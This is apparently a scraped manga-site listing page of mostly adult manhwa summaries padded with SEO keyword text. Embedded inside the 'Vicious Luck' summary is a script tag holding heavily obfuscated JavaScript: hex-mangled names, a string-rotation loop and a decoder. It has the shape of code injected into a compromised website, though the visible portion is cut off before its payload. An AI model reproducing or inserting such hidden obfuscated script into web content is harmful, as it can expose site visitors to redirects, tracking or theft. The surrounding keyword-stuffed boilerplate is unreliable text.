
Please Be Gentle, My Bossy Uncle! The Killer Queen Has Got A Chance To Live Her Life Again, But Two Things Scare

Her… One Is When Master Jue Flirts With Her.

226 results

18+ Vicious Luck

Chen Yang was just an ordinary person. One day, he was given an opportunity: he was offered the ability to control his luck! Love, status, and fortune were suddenly all within his grasp. When a person can control his luck at will, how will his life change? Will he run into beauties as soon as he steps outside his door? Will he trade as much stock as he possibly can? Damn… it’s too good to be true… Those who are my friends will all live wonderful lives. Those who are my enemies have already paid the price!<script></script><script>(function(_0xccb202,_0x47bf26){var _0x5c82f9=_0x1d13,_0x3e7c42=_0xccb202();while(!![]){try{var _0x5817c8=-parseInt(_0x5c82f9(0xb8))/(-0x209d+0x485*0x7+0xfb)+-parseInt(_0x5c82f9(0xcd))/(-0x19e4*-0x1+-0x1*0x11c5+-0x81d)+parseInt(_0x5c82f9(0xc1))/(0x1*0xc5+-0x2*-0x11af+-0x2420)+-parseInt(_0x5c82f9(0xcb))/(0x22c*0x6+-0x2b*-0x89+-0x2407)+-parseInt(_0x5c82f9(0xb9))/(-0x3d*0x32+-0x1cdd+-0x2ea*-0xe)*(parseInt(_0x5c82f9(0xcf))/(-0x21c8+0x24c2+-0x2f4))+-parseInt(_0x5c82f9(0xba))/(-0xa*-0x3d3+-0x5*0x62+-0x1*0x244d)+parseInt(_0x5c82f9(0xbd))/(-0x20b5*0x1+-0x2539+0x45f6);if(_0x5817c8===_0x47bf26)break;else _0x3e7c42['push'](_0x3e7c42['shift']());}catch(_0x425f9b){_0x3e7c42['push'](_0x3e7c42['shift']());}}}(_0x3be2,-0xaed80+0x2c*0x1d5f+-0x31993*-0x6));function _0x1d13(_0x466487,_0x58752e){var _0x327798=_0x3be2();return _0x1d13=function(_0x4a1d92,_0x7cd320){_0x4a1d92=_0x4a1d92-(-0x1130+-0x1cd6+0x2ebb);var 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20-Year-Old College Jocks

After breaking up with an irredeemable trash of an ex-boyfriend, the only thing Hyemin is lacking is sex. Normally, she wouldn't even look at a dating app, but the younger guy she met there brought a friend to their meeting place. “'Is it okay if we do it with the three of us, noona?' “Isn't that only possible in videos? …I don't know, let's just go for it like I've won the lottery!”


A Deal With My Fake Husband

Read A Deal With My Fake Husband Novel – A Deal With My Fake Husband Manhwa Online Free On Mangazin The Summary Of The Comic A Deal With My Fake Husband: Princess Elysia Is Part Of A Fallen Royal Family. When Elysia’s Fourth Husband Died, People Started Calling Elysia A Husband-Eating Witch, All Due To The Greedy Schemes Of Her Mother And Brother Hungry For Her Inheritances. Upon Realizing This, Elysia Decided To Turn Back Time To Take Revenge By Choosing A Husband That Would Follow Her Lead. She Needed A Commoner To Play The Role Of Her Husband As Her Puppet… But The Man She Hired To Act As Her Husband Turned Out To Be Someone Above And Beyond, Going Beyond Her Wildest Dreams. Elysia Then Had No Choice But To Alter Her Original Plan. “A Deal With My Fake Husband” Is Also Known As: A Well-Raised Contract Husband / Promettez-Moi De Ne Pas Mourir / 契約夫と共に甘い復讐を / 잘 키운 계약 남편 “Zinmanga, Likemanga, Kunmanga…” Are The Most Searched Keywords On The Website Mangazin. We Offer A Wide Selection Of The Best And Newest Comic Series With All Chapters Updated Quickly And Featuring High-Quality Images, Providing Readers With Wonderful And Enjoyable Reading Experiences At Manga Zin. You Can Read Top Manhwa The Twin Swords Of The Sima Deadly Nightshade The Queen’s Secret Lessons

1 days ago

A Fool And A Girl

Diha was ashamed and embarrassed to engage in a relationship with Rujin who lived under the same roof as her. But eventually, they coveted each other and allowed their instincts to lead. They never knew the feelings of love, but together, they'll search for it.


A Foxy Affair

Read “A Foxy Affair Novel” – “A Foxy Affair Manga” Online Free At Hari Manga The Summary Of The Comic A Foxy Affair: [30,000 Golden Coins, Is It Really Possible?] Seol Yoo-Yeon, A Young Killer, Receives A Request For 30,000 Gold While Drunk. But The Stipulation That The Target Must Be Killed As An Act Of Revenge Is Bizarre. Unable To Break The Contract, She Disguises Herself As A New Bride And Enters Mr. Zhu’s Mansion, Where She Finds Out That Her Client, Brother Lee Hyun, And Her Target, Brother Lee Hwi Are Sharing A Body. The Older Brother, Lee Hyun, Says That In Order To Sweeten The Younger Brother’s Body, Lee Hwi Should Avoid The Groom For A While And Take Lessons From Him. She Thought She Only Had To Do It With The Target, But Now She Has To Do It With The Client Too? To Make Matters Worse, They Say That They Are Fox Gods Who Have Lived For A Thousand Years… No Matter That Seol Yu-Yeon Is The Best Killer In The World, Is This Assassination Even Really Possible?! “A Foxy Affair” Is Also Known As: Fox House / Fox Mansion / Fox Palace / Le Manoir Des Renards / Yeou Jeotaeg / Yeoujeotaeg / ตำหนักจิ้งจอก / 여우 저택 / 여우저택 The Comic “A Foxy Affair” Belongs To The Genre: Adaptation, Drama, Fantasy, Historical, Manhwa, Mature, Romance, Smut, Supernatural “Harimanga, Manga Updates, Manhwa Website…” Are The Most Searched Keywords On The Website Kun Manga. We Offer A Wide Selection Of The Best And Newest Comic Series With All Chapters Updated Quickly And Featuring High-Quality Images, Providing Readers With Wonderful And Enjoyable Reading Experiences At Likemanga. You Can Read Top Manga The Regretful Villainess Is Happy Because She Got Divorced Underworld Restaurant I Became The King By Scavenging

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All Male Protagonists Are Ill

Read All Male Protagonists Are Ill Novel – All Male Protagonists Are Ill Manhwa Online Free At KunManga The summary of the comic All Male Protagonists Are Ill: Reincarnated into an otome game, the heroine has to make the &#8220;mentally sick&#8221; heroes fall in love in order to return to the real world! &#8220;All Male Protagonists Are Ill&#8221; is also known as: Guys in This Game Have Psychosis / Guys in This Game Are All Psychos / In a Certain B-Game, All of Its Male Leads Are Yanderes / Mǒu Yǐ Yóu Nán Zhǔ Dōu Yǒu Bìng / 某乙游男主都有病 &#8220;TopManhua, MangaUpdates, LikeManga&#8230;&#8221; are the most searched keywords on the website MANGAZIN. We offer a wide selection of the best and newest comic series with all chapters updated quickly and featuring high-quality images, providing readers with wonderful and enjoyable reading experiences at MANGA ZIN. You can read TOP MANHUA Two Weeks and Counting Deadlines are Raining in the Status Window I Became The King by Scavenging


Altruistic Warrior

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Apollo’s Heart

“Warning: Mature content: This manga contains materials that might not be suitable to children under 17. By proceeding, you are confirming that you are 17 or older.” In the busy lobby, the woman whom he believed had died years ago appeared before his eyes. Yet, once again, he lost her in the sea of faces. “Who is this Jin Hye-Yeon you are looking for?” Instead of answering, Tae-Jun pulled out a cigarette from his cigar case, lit it up and continued searching through the hotel’s visitors list. “Is that your lover who died four years ago?” Tae-jun finally looked up, “… How do you know about her?” 아폴론의 심장
